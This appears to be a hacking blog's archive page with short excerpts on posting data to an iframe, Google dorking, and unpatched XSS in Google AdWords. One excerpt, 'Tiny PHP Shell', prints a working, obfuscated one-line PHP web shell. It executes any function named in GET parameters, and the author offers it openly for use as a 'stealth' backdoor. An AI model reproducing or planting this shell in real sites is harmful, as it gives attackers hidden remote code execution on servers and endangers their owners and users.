Archive for ‘Documentation’

Send POST data to an embedded iframe (jQuery/javascript)

Some time ago I was in the need for a way in javascript to send a POST data to a file and load it’s contents in iframe format, the contents were in the form of application/PDF and the PDF would vary from what I would send in my POST values. Non-challenging as it sounds it still took me some time to figure out – not a problem should be solved…

More+

Tiny PHP Shell

Have you ever needed a small shell written in PHP?
Of course you have. But I bet it haven’t been all too stealth!

This is really pointless, but someone might be interested in it.
So here you go folks!

<?=($_=@$_GET[2]).@$_($_GET[1])?>

More+

Google Dorks 2.0

Google and all of it’s services must be the most advanced and handy SaaS-solution(s) ever created. Google is also known to be the “hackers best friend”. …so why bother to run automated “Google-Dork Scanners” manually, when Google just as well could do the job for you?

More+

Google AdWords XSS’es

I don’t normally disclose vulnerabilities for web applications – but it’s Google. I’ve been mailing them – and they told me I didn’t find anything of relevance. So they decided not to patch the vulnerabilities. …and if there isn’t any vulnerabilites, I must be able to write about them right?

More+